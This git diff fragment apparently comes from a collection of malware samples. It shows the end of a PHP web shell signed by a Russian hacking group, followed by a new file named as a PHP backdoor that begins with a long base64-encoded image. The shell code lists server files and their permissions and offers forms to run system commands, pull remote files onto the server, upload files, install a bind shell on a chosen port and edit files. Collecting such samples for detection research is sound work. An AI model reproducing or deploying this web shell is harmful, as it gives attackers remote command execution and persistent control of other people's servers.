"; +} + +} +$arr = array(); + +$arr = array_merge($arr, glob("*")); +$arr = array_merge($arr, glob(".*")); +$arr = array_merge($arr, glob("*.*")); +$arr = array_unique($arr); +sort($arr); +echo ""; + +foreach ($arr as $filename) { + +if ($filename != "." and $filename != ".."){ + +if (is_dir($filename) == true){ +$directory = ""; +$directory = $directory . "";} +else{ +$directory = $directory . ""; + +} + +if (is_readable($filename) == true){ +$directory = $directory . "";} +else{ +$directory = $directory . ""; +} +$dires = $dires . $directory; +} + +if (is_file($filename) == true){ +$file = ""; +$file = $file . "";} +else{ +$file = $file . ""; +} + +if (is_readable($filename) == true){ +$file = $file . "";} +else{ +$file = $file . ""; +} +$files = $files . $file; +} + + + +} + + + +} +echo $dires; +echo $files; +echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$file = $file . "YesNoYes
No

"; + + + + +echo " +
+
Command:
+ + +
Directory: +
"; + + + +echo "
+
Download here from: + +into: + + +
"; + +echo "
+ +
+Download from Hard: + + +
"; + + + +echo "
+
Install bind +Temp path +Port + + + +
"; + + +echo "
+
File to edit: + + +
"; + + + +echo "
+
+ +
"; +?> +
+ + +
+ + +
Coded by Loader Pro-Hack.RU
+ + +
+ diff --git a/PHP/Backdoor.PHP.WebShell.af b/PHP/Backdoor.PHP.WebShell.af new file mode 100644 index 00000000..f0255d10 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.af @@ -0,0 +1,268 @@ +"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